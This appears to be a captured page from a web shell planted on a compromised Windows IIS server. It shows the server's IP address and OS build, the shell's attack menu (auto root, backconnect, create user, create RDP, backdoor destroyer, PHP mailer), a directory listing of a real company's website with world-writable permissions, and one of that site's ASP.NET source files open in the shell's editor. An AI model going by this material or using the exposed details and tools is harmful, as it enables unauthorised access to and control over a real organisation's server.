Windows NT HGWS2 10.0 build 14393 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
: | : 3.141.167.59
Cant Read [ /etc/named.conf ]
8.3.19
IWPD_185(eibegypt)
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
D: /
InetPub /
vhosts /
eib-egypt.com /
httpdocs /
AR /
[ HOME SHELL ]
Name
Size
Permission
Action
JS
[ DIR ]
drwxrwxrwx
Pics
[ DIR ]
drwxrwxrwx
Scripts
[ DIR ]
drwxrwxrwx
Slider_css
[ DIR ]
drwxrwxrwx
Slider_images
[ DIR ]
drwxrwxrwx
Slider_scripts
[ DIR ]
drwxrwxrwx
UpperBanner_Photos
[ DIR ]
drwxrwxrwx
fancybox
[ DIR ]
drwxrwxrwx
flaunt-js
[ DIR ]
drwxrwxrwx
mmenu-4.0.2
[ DIR ]
drwxrwxrwx
res-Slider
[ DIR ]
drwxrwxrwx
sidr-package-1.1.1
[ DIR ]
drwxrwxrwx
Copy of MasterPage.master
12.46
KB
-rw-rw-rw-
Copy of MasterPage.master.cs
2.33
KB
-rw-rw-rw-
Default.aspx
2.76
KB
-rw-rw-rw-
Default.aspx.cs
2.83
KB
-rw-rw-rw-
Design.psd
912.99
KB
-rw-rw-rw-
MasterPage.master
34.55
KB
-rw-rw-rw-
MasterPage.master.cs
11.72
KB
-rw-rw-rw-
Page.aspx
398
B
-rw-rw-rw-
Page.aspx.cs
369
B
-rw-rw-rw-
WUC_AdminBar.ascx
4.74
KB
-rw-rw-rw-
WUC_AdminBar.ascx.cs
17.62
KB
-rw-rw-rw-
WUC_EditorPage.ascx
648
B
-rw-rw-rw-
WUC_EditorPage.ascx.cs
5.89
KB
-rw-rw-rw-
WUC_Footer.ascx
1.62
KB
-rw-rw-rw-
WUC_Footer.ascx.cs
1.81
KB
-rw-rw-rw-
WUC_Header.ascx
1.6
KB
-rw-rw-rw-
WUC_Header.ascx.cs
1.73
KB
-rw-rw-rw-
WUC_UpperBanner.ascx
1.9
KB
-rw-rw-rw-
WUC_UpperBanner.ascx.cs
2.86
KB
-rw-rw-rw-
css_Main.css
8.25
KB
-rw-rw-rw-
css_Main_Mobile.css
1.93
KB
-rw-rw-rw-
ieupdate.js
150
B
-rw-rw-rw-
index.htm
318
B
-rw-rw-rw-
inner_Mail.aspx
2.91
KB
-rw-rw-rw-
inner_Mail.aspx.cs
4.55
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : WUC_Footer.ascx.cs
using System; using System.Data; using System.Configuration; using System.Collections; using System.Web; using System.Web.Security; using System.Web.UI; using System.Web.UI.WebControls; using System.Web.UI.WebControls.WebParts; using System.Web.UI.HtmlControls; public partial class EN_WUC_Footer : System.Web.UI.UserControl { bool bool_inAdmin = false; DBAccess.DBAccess ClSqlCmd; public void Page_Load(object sender, EventArgs e) { ClSqlCmd = new DBAccess.DBAccess(System.Configuration.ConfigurationSettings.AppSettings["SE_ConnectionString"]); /////////////////////////////////////////////////////////////////////////// if (Session["AdminID" + System.Configuration.ConfigurationSettings.AppSettings["SE_ModuleID"]] == null || Session["AdminID" + System.Configuration.ConfigurationSettings.AppSettings["SE_ModuleID"]].ToString() == "") //Admin logged in { bool_inAdmin = false; } else { bool_inAdmin = true; } ///////////////////////////////////////////////////////////////////////////// //if (bool_inAdmin) //Admin logged in //{ // td_AdminControls_Left.Visible = true; // td_AdminControls_Right.Visible = true; // td_SiteContent.Attributes["class"] = "AdminBorder_BorderOnlyStyle"; //} //else //{ td_AdminControls_Left.Visible = false; td_AdminControls_Right.Visible = false; td_SiteContent.Attributes["class"] = ""; //} //////////////////////////////////////////////////////////////////////////// if (!Page.IsPostBack) { WUC_EditorPage1.int_EditorPage_Type_ID = 2001; //GetData(); } } }
Close